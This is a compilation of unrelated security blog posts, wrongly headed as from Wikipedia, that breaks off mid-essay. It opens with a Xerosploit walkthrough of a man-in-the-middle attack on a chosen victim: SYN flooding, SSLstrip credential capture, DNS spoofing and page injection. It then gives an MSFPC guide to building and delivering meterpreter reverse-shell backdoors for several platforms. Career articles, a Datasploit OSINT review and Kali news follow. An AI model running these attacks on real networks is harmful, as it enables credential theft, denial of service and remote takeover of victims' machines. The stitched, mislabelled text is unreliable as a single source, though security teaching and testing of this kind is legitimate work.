From Wikipedia.org

Xerosploit Installation

Xerosploit is an attack tool for MITM which can run only on Linux OS to do so follow the simple steps:-

Open up terminal and type

git clone https://github.com/LionSec/xerosploit.git
cd xerosploit
./install.py

It will ask to choose your operating system, here we have press 1 for Kali Linux.

Here it will display your network configuration including IP address, MAC address, gateway, and interface and host name. Now run the following command on xerosploit console to know the initial commands:

help

In this grid we have list of commands for our attack and we are going for man in middle attack, so I will choose scan command in my next step for scanning the whole network.

scan

This command will scan complete network and will found all devices on your network.

As you can observe that it has scanned all the active hosts. There are so many hosts in this network; you have to choose your target from given result. I am going to select 192.168.1.105 for man in middle attack.

192.168.1.105

 In next comment it will ask for module you want to load for man in middle attack. Go with this comment and type help.

help

pscan (Port Scanner)

Let’s begin with pscan which is a port scanner, it will show you all the open ports on network computer and retrieve version of the programs running on the detected ports. Type run to execute pscan and it will show you all the open ports of victim’s network.

pscan

DOS (Denial of service)

Type “dos” to load the module, it will send a succession of TCP-SYN request packet to a target’s system to make the machine unresponsive to legitimate traffic which mean it is performing SYN Flood attack.

dos
run

press ctrl + c to stop

If you are aware of HPING tool then you can notice, this module is initially using HPING command for sending countless SYN request packet.

Inject HTML (HTML Injection)

HTML injection is the vulnerability inside any website that occurs when the user input is not correctly sanitized or the output is not encoded and attacker is able to inject valid HTML code into a vulnerable web page. There are so many techniques which could be use element and attributes to submit HTML content.

So here we will replace victim’s html page with ours. Select any page of yours choice as you will notice that I have written “You have been hacked” in my index.html page which I will replace with the victim’s html page. Whatever page the victim will try to open he/she will see only the replaced one.

First create a page as I have created & save it on Desktop by the name of INDEX.html

Now run injecthtml command to load the injecthtml module. And then type run command to execute the injecthtml and enter the path where you have saved the file.

Bravo! We have successfully replaced the page as you can see in the picture below.

Hit ctrl^c to stop the attack.

Sniff

Now run the following module to sniff all the traffic of the victim with command:

sniff

Then enter the following command to execute that module:

run

Now it will ask you if you want to use SSLTRIP to strip the HTTPS URl’s to HTTP so that we can they catch the login credentials in clear text. So enter y.

When the victim will enter the username and password it will sniff and capture all the data.

Now it will open a separate terminal in which we can see all the credentials in clear text. As you can see it has successfully captured the login credentials.

Hit ctrl^c to stop the attack.

dspoof

It load dspoof module which will supply false DNS information to all target browsed hosts Redirect all the http traffic to the specified one IP.

Now type run command to execute module and then it will ask the IP address where you want to redirect the traffic, here we have given our Kali Linux IP.

Now as soon as the victim will open any webpage he/she will get the page store in our web directories which we want to show him/her as shown in the picture below.

Hit ctrl^c to stop the attack.

Yplay

Now let’s catch the other interesting module which is yplay. It will play background video sound in victim browser of your choice. So first execute yplay command followed by run command and give the video i.d what you have selected.

Open your browser and choose your favorite video in YouTube which you want to play in background in victim’s browser. If video having any advertisement then skip that and select id from url. Come back to xerosploit.

yplay

 To execute yplay module for attack type run.

run

Insert you tube video ID which you have copy above from url in next step.

febVHEarpeQ

Now in no matters what victim is doing on the laptop. If he will try to open any webpage, on the background he/shell will hear the song which we want him to listen.

Hit ctrl^c to stop the attack.

Replace

I hope all the attacks were quite interesting. But the next is going to be amazing. Now we will replace all the images of victim’s website with our images. For this first execute the command replace followed by run command. Don’t forget to give the path of the .png file which you have created as a surprise box for the victim.

replace
run
/root/Desktop/1.png

As the victim opens any url he/she will be amazed to see the replaced images of his/her website as shown here.

Hit ctrl^c to stop the attack.

Driftnet

 We will use driftnet module to capture all the images the victim is surfing on the web with following commands and it will save all captured picture in opt/xerosploit/xedriftnet.

driftnet
run

Once the attack is launched; we can sniff down all the images that he is viewing on his computer in our screen. We can do much more with this tool simply by using the move you can shake the browser contents 

As you can observe that all the images what victim is viewing on his/her system is captured in your system successfully.

Hopefully!  So it is needless to say that this tool XERSPLOIT is quite interesting and useful as well for performing so many attacks. I hope readers are gonna like this.

HaPpY hAcKing!!

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Xerosploit- A Man-In-The-Middle Attack Framework appeared first on Hacking Articles.

Comprehensive Guide on MSFPC

Hello Friends!!

As you all are aware of MSFvenom-A tool in Kali Linux for generating payload, is also available as MSFvenom Payload Creator (MSFPC) for generating various “basic” Meterpreter payloads via msfvenom. It is fully automating msfvenom & Metasploit is the end goal.

MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on user’s choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

Source: https://github.com/g0tmi1k/mpc

Author: g0tmi1k

Syntax

msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

Create a Payload with Interactive IP Mode

Let’s create the payload for Windows platform with the help of following command

msfpc windows

When you will enter above command it will automatically confirm the interface:

Which interface should be used?

eth0, lo wan

We press 1 for eth0 and then it will start generating payload and as result give us following:

  1. Location of MSF handler file and windows meterpreter created.
  2. Command to be run to start multi handler automatically within metasploit framework.
  3. Command for file transfer through web server.

 

Basically the msfpc is design to reduce the user’s effort in generating payload of various platforms with different-different format of file. So when you will type “msfpc” it will display all types of platform and generate a specific format of file likewise.

Syntax: msfpc <platform-type> <Lhost IP> <Lport>

Windows Payload

If you want to generate a payload to get meterpreter session victim’s machine which operates on Windows, then all you need to do is type following:

msfpc windows 192.168.1.109 1234

If you will not mention IP, it will automatically ask to choose interface as discussed above and choose 443 as default lport. It creates a malicious backdoor in the .exe format for 32-bit architecture. Then it will start generating the payload and as result give us details following details.

  • Location of MSF handler file and windows meterpreter created: ‘/root/windows-meterpreter-staged-reverse-tcp-1234.exe’
  • command to be run to start multi handler automatically: msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

 

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to download and run the .exe file that will provide meterpreter session to the attacker.

http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe

Conclusion: Earlier the attackers were using manual method to generate a payload via msfvenom command and then use Metasploit module “multi/handler” to access the reverse connection via meterpreter session and this technique was quite successfully approach to compromise a victim’s machine although took much time. But same approach is applicable with the help of MSFPC for generating various “basic” Meterpreter payloads via msfvenom.

Android Payload

If you want to generate a payload to get meterpreter session victim’s machine which operates on Android, then all you need to do is type following:

msfpc apk 192.168.1.109 1234

It creates a malicious backdoor in the .apk format. Then it will start generating the payload and as result give us following details.

  • Location of MSF handler file and android meterpreter created: ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk’
  • Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and run the .apk file that will provide meterpreter session to the attacker.

http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk

Hence you can observe as said above, we have meterpreter session of target’s machine.

BASH

The pro above MSFPC is that it reduces the stress to remember the format for each platform, all we need to do is just follow the above declare syntax and the rest will be managed by MSFPC automatically. Suppose I want to create a payload for Bash platform, and then it will take a few minutes in MSFPC to generate a bash payload.

msfpc bash 192.168.1.109 1234

It creates a malicious backdoor in the .sh format. Then it will start generating the payload and as result give us following:

  • Location of MSF handler file and bash meterpreter created: ‘/root/bash-shell-staged-reverse-tcp-1234.sh.’
  • Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/bash-shell-staged-reverse-tcp-1234.sh.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the bash script with full permission, it will give command shell.  

http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777 bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh

Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.

sessions -u 1

Linux

If you want to generate a payload to get meterpreter session victim’s machine which operates on Linux, then all you need to do is type following:

msfpc linux 192.168.1.109 4444

It creates a malicious backdoor in the .elf format. Then it will start generating the payload and as result give us following details:

  • Location of MSF handler file and Linux shell created: ‘/root/linux-shell-staged-reverse-tcp-4444.elf
  • Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/linux-shell-staged-reverse-tcp-4444.elf.rc’
  • Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

 

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the application and once the target run the .elf file with full permission, it will give command shell. 

http://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf

Hence you can observe as said above, we have command shell of target’s machine and with the help of the following command we have upgraded it into meterpreter shell.

sessions -u 1

Python

If you want to generate a payload to get meterpreter session victim’s machine which operates on Python, then all you need to do is type following:

msfpc python 192.168.1.109 5555

It creates a malicious backdoor in the .py format. Then it will start generating the payload and as result give us following detaisl:

Location of MSF handler file and python meterpreter created: ‘/root/python-meterpreter-staged-reverse_tcp-5555.py

Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/python-meterpreter-staged-reverse_tcp-5555.py.rc’
Command for file transfer through web server: python2 -m SimpleHTTPServer 8080

Now run the following command to launch multi/handler and web server for file transfer.

msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
python2 -m SimpleHTTPServer 8080

When victim will browse the following URL where it will ask to install the script and once the target run the python script, it will give meterpreter session. 

http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py

Hence you can observe as said above, we have meterpreter session of target’s machine

Batch (Generates all Possible Combination Payloads)

 Batch is most significant Mode as it generate as much as possible combination of payload. If we want to create all payloads which can give meterpreter session then we can use the following command in that situation.

msfpc msf batch eth0

In the given below command you can observe here it has generated all possible types payload which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.

If we want to create all payloads which can give command shell session of the target’s machine then we can use the following command in that situation.

msfpc cmd batch eth0

In the given below command you can observe here it has generated all possible types payload which can give command shell.

Loop (Generates One payload for Each Platform)

Loop is also most significant mode as it generates on of each type of payload with their default values. Hence by default will generate a payload to provide meterpreter session rather than command shell session.

msfpc verbose loop eth0

In the given below command you can observe here it has generated all possible types payload for each platform which can give meterpreter sessions. Although the rest technique is as above to execute the payload and get reverse connection.

Generating Stageless Payload

As we all know there are two types of payloads i.e. stag and stageless and by default it creates a stage payload. If you want to create a stageless payload then you can go with the following command to generate stageless payload for command shell session or meterpreter session.

msfpc stagless cmd window 192.168.1.109 
msfpc stagless msf  window 192.168.1.109

The rest technique is as above to execute the payload and get reverse connection.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Comprehensive Guide on MSFPC appeared first on Hacking Articles.

Comprehensive Guide on SearchSploit

Hello friends!! Several times you might have read our articles on CTF challenges and other, where we have used searchsploit to find out an exploit if available in its Database. Today in this article we are going to discuss searchsploit in detail.

Table of Content

  • Introduction to searchsploit
  • Title Searching
  • Advance Title Searching
  • Copy To Clipboard
  • Copy To Directory
  • Examine an Exploit
  • Examining Nmap result
  • Exploit-DB Online
  • Eliminate Unwanted Results
  • Case Sensitive

Introduction to SearchSploit

Included in the Exploit Database repository on GitHub is “searchsploit”, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without Internet access.

Since we are using GNOME build of Kali Linux therefore the “exploitdb” package is already included by default, all we need to do, open the terminal and just type “searchsploit” and press Enter. You will welcome by its help screen.

Source: https://www.exploit-db.com/searchsploit/

Title Searching

Using –t option enables “title” parameter to search an exploit with specific title. Because by default, searchsploit will try both the title of the exploit as well as the path. Searching an exploit with specific title gives quick and sorted results. 

Syntax: searchsploit [option] <title>

searchsploit -t java

The above command will search exploit related to the java platform and will show all exploit available in the exploit DB database.

Advance Title Searching

Even you can use –t option, to get more fine result in finding the exploit of any particular platform. For example, if you want to find out java exploit for windows platform, then you can consider the following command.

searchsploit –t java windows

Now you can compare the current output result from the previous result.

Copy To Clipboard

Using –p options, enables “copy to clipboard parameter” as this option provides more information related to the exploit, as well as copy the whole path to the exploit to the clipboard, all you need press Ctrlv to paste.

searchsploit 39166
searchsploit -p 39166

In the following image we have shown the default result varies when we use –p option along it.

Copy To Directory

using –m options, enables “copy to directory/folder parameter” as this option provides same information as above related to the exploit, as well as copy the exploit in your current working directory.

searchsploit 39166
searchsploit -m 39166

In the following image we have shown the default result varies when we use –m option along it.

Examine an Exploit

Using —examine option, enables examine parameter to read the functionality of that exploit with the help of $PAGER.

searchsploit 39166 --examine

The above command will open the text file of the exploit to review its functionality, code and other information.

Examining Nmap result

As we all known, Nmap has very remarkable feature that let you save its output result in .xml format and we can identify each exploit associated with nmap xml file.

nmap -sv 192.168.1.102 -oX result.xml

With the help of above command we have saved the scanning result of nmap in an xml file, so that we can search the exploit related to scanned port/services.

Using –x option enables the examine parameter as well as  –nmap option Checks all results in Nmap’s XML output with service version to find out related exploit with it.

searchsploit –x --nmap result.xml

Here you can observe that, it is using verbose mode for examine xml file and had shown all possible exploit of running services.

Continue reading…

Exploit-DB Online

Using –w option, enables website URL because on its website you will get more detailed information such CVE-ID, setup files, tags, and vulnerability mappings which is not included in searchsploit.

searchsploit ubuntu 14.04 –w

The above command will show all available Exploit DB website links for the exploit related to ubuntu 14.04.

Eliminate Unwanted Results

using –exclude option, it enables exclude parameter to remove unwanted result from inside the list of exploit. You can also remove multiple terms by separating the terms with a “|” (pipe). This can be considered in the following:

searchsploit ubuntu 14.04
searchsploit --exclude="Privilege Escalation"

In the following image we have shown the default result varies when we use –exclude option along it. Even you can eliminate more terms with the help of “|” (pipe)

searchsploit --exclude="Privilege Escalation" | (Poc)

Moreover we can use the universal Grep command to remove unwanted result from its output result. This can be considered in the following:

searchploit ubuntu14.04
searchploit ubuntu 14.04 | grep "Buffer Overflow"

The above command will only look for all available exploit of ubuntu 14.04 on Buffer Overflow and dump the result.

Case Sensitive

Using –c option, enables the “case-sensitive search” parameter to find out exploit related to specific character mention in the command, by default it makes insensitive search. You can consider the following example:

searchsploit xss
searchsploit –c XSS

As you can observe by default it has show all available exploit related to xss/XSS but in the next command it has shown the result only for XSS.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Comprehensive Guide on SearchSploit appeared first on Hacking Articles.

Pentesters: Employment Options & Salaries

Are you a professional pentester or aspiring to become one? Penetration testing is a skill-based role, and the more skills and practical experience you have, the more your value will increase. Here are some of the employment options and salaries for professional penetration testers.

Employment Options of Penetration Testers

Freelance 

IT Security freelancers get paid by the project and directly by companies requesting their services. As a freelancer, you can offer any service a company may need, from simple penetration tests to consulting on their entire security strategy.

One common path for professional penetration testers is Bug Hunting. Not only will your existing skills help you to be good at it, but you will also have a choice to hunt for bugs during your free time or on a more full-time manner. Attention, revenue is not guaranteed. Bug hunters usually get paid based on the vulnerability type and severity. There are numerous online platforms here to help you find the right gig. Some companies offering freelance gigs for experienced professionals that you can try are BugCrowd & HackerOne.

Find out how to use your pentesting skills to make extra bucks as a Bug Hunter here.

IT Security Service Company 

Here, you are working with a company as a third-party contractor providing a service. Clients can request a various range of services from basic vulnerability assessments to incident handling and response after a breach. Some of the services corporations frequently ask for are:

  • Mapping of their organization’s IT infrastructure
  • Implementing the right cybersecurity strategy for their company
  • Performing pentests on their systems, networks, mobile or web applications, etc.
  • Hunting for vulnerabilities in their infrastructure, applications, etc.
  • Incident handling and/or response after a data breach

There is an infinite number of requests depending on the organization asking, so professionals working with IT Security service companies must have extensive knowledge.

In-house Employee 

When working ‘In-House’, you are directly hired by the company as a part of the IT Security department. Depending on your job role, you might be in charge of monitoring computer networks for security issues, simulating cyber attacks in order to identify and report security flaws, operating software to protect systems and information infrastructure, investigating security breaches and other incidents, and much more…

As an in-house employee, you do not have external clients. Your client is the company you work for.

How Much Does a Penetration Tester Earn?

Standard penetration tests can range from $4,000 up to $15,000 if done as a renown service company. As a freelancer, you can choose to either get paid per hour of service or per project. The cost depends on the size and scope of the penetration test, so make sure to read all the details before agreeing to a freelance gig.

According to Glassdoor, in-house penetration testers in the US can earn between $49K and $109K per year. Depending on your specialization, expertise, and experience, it can be much more. The highest paying skills associated with this job deal with network security management, web security & encryption, and security testing & auditing.

Read more about the skills next-level IT Security professionals should have here.

With more malware created in just a few hours than in the entire 20th century, corporations are on high-alert to keep their data and those of their customers secure. For this reason, more and more organizations find themselves searching for temporary workers to help with their extra security needs – and professionals turn to different employment options, either full-time or as a side-hustle.

Find out everything you need to know to keep your company secure and become a professional pentester with the PTP training course.
GET FREE TRIAL

Source: Prospects | Business Insider


Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

#CyberAware – 4 FAQs on Penetration Testing

Penetration testing is one of the best practices to ensure a company’s infrastructure is secure from bad actors trying to get their hands on confidential information. On the occasion of this year’s National Cybersecurity Awareness Month (NCSAM)#CyberAware – we want to discuss 4 of the most frequently asked questions about penetration testing.

What is the difference between a Vulnerability Assessment and a Penetration Test?

A vulnerability assessment is aimed at identifying known vulnerabilities in an organization’s infrastructure. This is helpful for establishing whether or not the company’s security measures are working. However, one does not actually exploit the vulnerabilities identified or consider the overall security management processes.

A penetration test (or pentest), on the other hand, evaluates the security of assets by running a series of planned attacks with the goal of finding and exploiting vulnerabilities. It is intended to be much more in depth, and a specific methodology must be respected.

In other words, the vulnerability assessment is a part of the penetration testing process, but the actual exploitation is in the next phase of the penetration testing cycle. Penetration testing is a more complete process, and goes as follow:

  • Information Gathering
  • Footprinting & Scanning
  • Vulnerability Assessment
  • Exploitation
  • Reporting

What are the different Types of Penetration Tests?

A penetration tester, much like an experienced ethical hacker, performs deep investigations of the remote system security flaws and test for all vulnerabilities, not just the ones that may grant them root access. Penetration testing is not about getting root. Some of the most common forms of penetration tests are:

  • Web Application penetration tests — typically to find a company’s technical vulnerabilities.
  • Infrastructure penetration tests — examines servers, firewalls and other hardware for security vulnerabilities.
  • Wireless penetration tests — attempts to locate access points and weak encryption algorithms.
  • Social engineering (simulated phishing) penetration tests — provides an independent assessment of employee susceptibility to phishing attacks.
  • Mobile application penetration tests — aims at finding a company’s technical vulnerabilities on mobile apps.

Learn more about web application pentesting, mobile application pentesting and network pentesting here.

What should be included in a Penetration Test Report?

Any thorough and professional penetration testing report should provide a detailed breakdown of your findings in an easily interpreted format. It is your way of officially delivering and communicating the results of your tests with executives, IT staff, and the development team, so you have to remember to talk in a manner that non-security teams understand.

A next-level report should include the followings:

  • The techniques used
  • The vulnerabilities found
  • All of the exploits used
  • The impact & risk analysis for each vulnerability
  • Possible remediation plan

Hint: Targeted tips on how to effectively remediate each vulnerability are the real value for the client.

What are the Limitations of Penetration Testing?

Undertaking a series of penetration tests are useful practices that will help strengthen an organization’s security, but they have their limitations. For example:

  • Limitations of scope
  • Limitations of time
  • Limitations on access
  • Limitations on methods

Read more about the different penetration testing limitations here.

Source: PTS Training CourseIT Governance 

Learn networking and programming skills up to the most important basics of penetration testing with the Penetration Testing Student (PTS) training course.
GET FREE COURSE

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

5 Ways Pentesters Can Earn Extra Revenue [Infographics]

Do you have an expensive project, want to earn big bucks or feel like taking on a new challenge? As a professional penetration tester, there are many things you can do to earn extra income. Whether you want to explore new opportunities or need the extra cash, here are 5 side-hustles to consider.

Reading from a mobile? Click on the image to enlarge it.

With very little time to adapt to new techniques and a fast-paced threat landscape, security professionals are busy trying to keep the internet secure while staying up-to-date on a regular basis. Still got some free time to take on an extra challenge? Feel free to try out one of these options, as it will surely boost your skills and ultimately enrich your career. If you decide to go for it, make sure to come back to us with details of your successes. We’d love to hear the stories you have to share!

Aspiring to become a professional penetration tester? Learn modern pentesting techniques with the penetration testing professional (PTP) training course.
GET FREE TRIAL

Sources: NIST | Freelancer | Glassdoor | Dark Reading | Sokanu | Security Intelligence

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Top 5 Skills for a Career in Digital Forensics

Digital forensics is the field where technology meets criminal justice. Professionals in this field use their InfoSec skills to recover data and analyze information from devices (such as computers, USB drives, phones, etc.) to solve a various range of crimes and take down criminals. Interested in building your career around digital forensics? Here are some skills you will need to succeed in this field.

1. Analytical Talent

Just as in any investigative role, digital forensics professionals need to have analytical skills. You’ll be required to piece together information to solve a case, so analytical thinking might just come in handy sooner than later.

2. Tech Fundamentals

Since digital forensics is a technical field, it helps to have a solid computer science background. Some of the pre-requisite skills we suggest are a strong understanding of the fundamentals of modern operating systems and a least a basic understanding of networks, network protocols, and programming languages.

3. IT Security Practical Know-How

While it’s a good start to have theoretical knowledge, you will also need practical skills to solve crimes in real-life. Even better is knowing how to prevent such accident from happening in the first place. This skill will make you a valuable team member. The perfect candidate for a digital forensics role will not only have experience working in general IT, but also specifically in security.

4. Communication Skills

Whether you work with a team or as a consultant after a breach, the people you work for will need to understand what happened. Good communication skills are crucial. In the same way penetration testers are expected to create professional reports of their findings, digital forensics investigators need to be able to explain in terms that the rest of the team understands.

5. Desire to Learn

With new threats appearing every day, it’s no surprise that professionals in this field need to stay up-to-date. With a desire to learn new skills and techniques, you can only succeed as a Digital Forensics Investigator, or, at the very least, one can be a valuable asset to the team.

With security professionals in high demand and many jobs going unfilled, the future for anyone with these skills is very bright indeed. Add to that the fact that the average Digital Forensic Investigator salary is over $70,000 a year (according to PayScale.com) with the top earners making well into 6 figures, it’s a great paying career to boot (pun intended).

Source: Forbes

Curious about Digital Forensics? Learn how to investigate cyber intrusions and assist in cases of incident response with the Digital Forensics Professional (DFP) training course.
GET MY FREE TRIAL

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

Toolsmith #127: OSINT with Datasploit

I was reading an interesting Motherboard article, Legal Hacking Tools Can Be Useful for Journalists, Too, that includes reference to one of my all time OSINT favorites, Maltego. Joseph Cox's article also mentions Datasploit, a 2016 favorite for fellow tools aficionado, Toolswatch.org, see 2016 Top Security Tools as Voted by ToolsWatch.org Readers. Having not yet explored Datasploit myself, this proved to be a grand case of "no time like the present."
Datasploit is "an #OSINT Framework to perform various recon techniques, aggregate all the raw data, and give data in multiple formats." More specifically, as stated on Datasploit documentation page under Why Datasploit, it utilizes various Open Source Intelligence (OSINT) tools and techniques found to be effective, and brings them together to correlate the raw data captured, providing the user relevant information about domains, email address, phone numbers, person data, etc. Datasploit is useful to collect relevant information about target in order to expand your attack and defense surface very quickly.
The feature list includes:
  • Automated OSINT on domain / email / username / phone for relevant information from different sources
  • Useful for penetration testers, cyber investigators, defensive security professionals, etc.
  • Correlates and collaborate results, shows them in a consolidated manner
  • Tries to find out credentials,  API keys, tokens, sub-domains, domain history, legacy portals, and more as related to the target
  • Available as single consolidating tool as well as standalone scripts
  • Performs Active Scans on collected data
  • Generates HTML, JSON reports along with text files
Resources
Github: https://github.com/datasploit/datasploit
Documentation: http://datasploit.readthedocs.io/en/latest/
YouTube: Quick guide to installation and use

Pointers
Second, a few pointers to keep you from losing your mind. This project is very much work in progress, lots of very frustrated users filing bugs and wondering where the support is. The team is doing their best, be patient with them, but read through the Github issues to be sure any bugs you run into haven't already been addressed.
1) Datasploit does not error gracefully, it just crashes. This can be the result of unmet dependencies or even a missing API key. Do not despair, take note, I'll talk you through it.
2) I suggest, for ease, and best match to documentation, run Datasploit from an Ubuntu variant. Your best bet is to grab Kali, VM or dedicated and load it up there, as I did.
3) My installation guidance and recommendations should hopefully get you running trouble free, follow it explicitly.
4) Acquire as many API keys as possible, see further detail below.

Installation and preparation
From Kali bash prompt, in this order:

  1. git clone https://github.com/datasploit/datasploit /etc/datasploit
  2. apt-get install libxml2-dev libxslt-dev python-dev lib32z1-dev zlib1g-dev
  3. cd /etc/datasploit
  4. pip install -r requirements.txt
  5. mv config_sample.py config.py
  6. With your preferred editor, open config.py and add API keys for the following at a minimum, they are, for all intents and purposes required, detailed instructions to acquire each are here:
    1. Shodan API
    2. Censysio ID and Secret
    3. Clearbit API
    4. Emailhunter API
    5. Fullcontact API
    6. Google Custom Search Engine API key and CX ID
    7. Zoomeye Username and Password
If, and only if, you've done all of this correctly, you might end up with a running instance of Datasploit. :-) Seriously, this is some of the glitchiest software I've tussled with in quite a while, but the results paid handsomely. Run python datasploit.py domain.com, where domain.com is your target. Obviously, I ran python datasploit.py holisticinfosec.org to acquire results pertinent to your author. 
Datasploit rapidly pulled results as follows:
211 domain references from Github:
Github results
Luckily, no results from Shodan. :-)
Four results from Paste(s): 
Pastebin and Pastie results
Datasploit pulled russ at holisticinfosec dot org as expected, per email harvesting.
Accurate HolisticInfoSec host location data from Zoomeye:

Details regarding HolisticInfoSec sub-domains and page links:
Sub-domains and page links
Finally, a good return on DNS records for holisticinfosec.org and, thankfully, no vulns found via PunkSpider

DataSploit can also be integrated into other code and called as individual scripts for unique functions. I did a quick run with python emailOsint.py russ@holisticinfosec.org and the results were impressive:
Email OSINT
I love that the first query is of Troy Hunt's Have I Been Pwned. Not sure if you have been? Better check it out. Reminder here, you'll really want to be sure to have as many API keys as possible or you may find these buggy scripts crashing. You'll definitely find yourself compromising between frustration and the rapid, detailed results. I put this offering squarely in the "shows much promise category" if the devs keep focus on it, assess for quality, and handle errors better.
Give Datasploit a try for sure.
Cheers, until next time...

Hacking WPA Enterprise with Kali Linux

Admittedly, somewhat of a click-bait blog post title - but bear with us, it's for a good reason. Lots of work goes on behind the scenes of Kali Linux, tools get updated every day and interesting new features are added constantly. Most of these tool updates and feature additions go unannounced, and are then discovered by inquisitive users - however this time, we had to make an exception.

Toolsmith Release Advisory: Kali Linux 2016.2 Release

On the heels of Black Hat and DEF CON, 31 AUG 2016 brought us the second Kali Rolling ISO release aka Kali 2016.2. This release provides a number of updates for Kali, including:
  • New KDE, MATE, LXDE, e17, and Xfce builds for folks who want a desktop environment other than Gnome.
  • Kali Linux Weekly ISOs, updated weekly builds of Kali that will be available to download via their mirrors.
  • Bug Fixes and OS Improvements such as HTTPS support in busybox now allowing the preseed of Kali installations securely over SSL. 
All details available here: https://www.kali.org/news/kali-linux-20162-release/
Thanks to Rob Vandenbrink for calling out this release. 

Kali Rolling ISO of DOOM, Too.

A while back we introduced the idea of Kali Linux Customization by demonstrating the Kali Linux ISO of Doom. Our scenario covered the installation of a custom Kali configuration which contained select tools required for a remote vulnerability assessment. The customised Kali ISO would undergo an unattended autoinstall in a remote client site, and automatically connect back to our OpenVPN server over TCP port 443. The OpenVPN connection would then bridge the remote and local networks, allowing us full "layer 3" access to the internal network from our remote location. The resulting custom ISO could then be sent to the client who would just pop it into a virtual machine template, and the whole setup would happen automagically with no intervention - as depicted in the image below.

In Defense of Ethical Hacking

Pete Herzog, wrote an interesting piece on Dark Matters (Norse’s blog platform) a while back, and I’ve given it a few days to sink in because I didn’t want my response to be emotional. After a few days I’ve re-read the post a few more times and still have no idea where Pete, someone I otherwise is fairly sane and smart (see his bio - http://blog.norsecorp.com/author/pherzog/) , gets this premise he’s writing about. In fact, it annoyed me enough that I wrote up a response to his post… and Pete, I’m confused where this point of view comes from! I’d genuinely like to know… I’ll reach out and see if we can figure it out.

— For the sake of this blog post, I consider ethical hacking and penetration testing to effectively be the same thing. I know not everyone agrees, and that’s unfortunate, but I guess you can’t please everyone.

So here on my comments on Pete’s blog post titled “The Myth of Ethical Hacking (http://blog.norsecorp.com/2015/01/27/the-myth-of-ethical-hacking/)”



I thought reacting is what you did when you weren’t secure. And I thought ethical hacking was proactive, showing you could take advantage of opportunities left by the stupid people who did the security.
— Boy am I glad he doesn’t think this way anymore. Reacting is part of life, but it’s not done because you’re insecure, it’s done because business and technology along with your adversaries is dynamic. It’s like standing outside without an umbrella. It’s not raining… but if you stand there long enough you’ll need an umbrella. It’s not that you are stupid, it’s that weather changes. If you’re in Chicago, like I am, this happens about every 2.7 seconds.
I also thought ethical hacking and security testing were the same thing, because while security testing focused on making sure all security controls were there and working right and ethical hacking focused on showing a criminal could penetrate existing security controls, both were about proactively learning what needed to be better secured.
— That’s an interesting distinction. I can’t say I believe this is any more than a simple different in word choice. Isn’t this all about validation of the security an organization thinks they have, versus the reality of how attackers act and what they will target? I guess I could be wrong, but these terms: vulnerability testing, penetration testing, ethical hacking, security testing — they create confusion in the people trying to consume these services, understand security, and hire. Do they have any real value? I this this is one reason standards efforts by people in the security testing space were started, to demystify, de-obfuscate, and lessen confusion. Clearly it’s not working as intended?
Ethical hacking, penetration testing, and red-teaming are still considered valid ways to improve security posture despite that they test the tester as much, if not more, than the infrastructure.
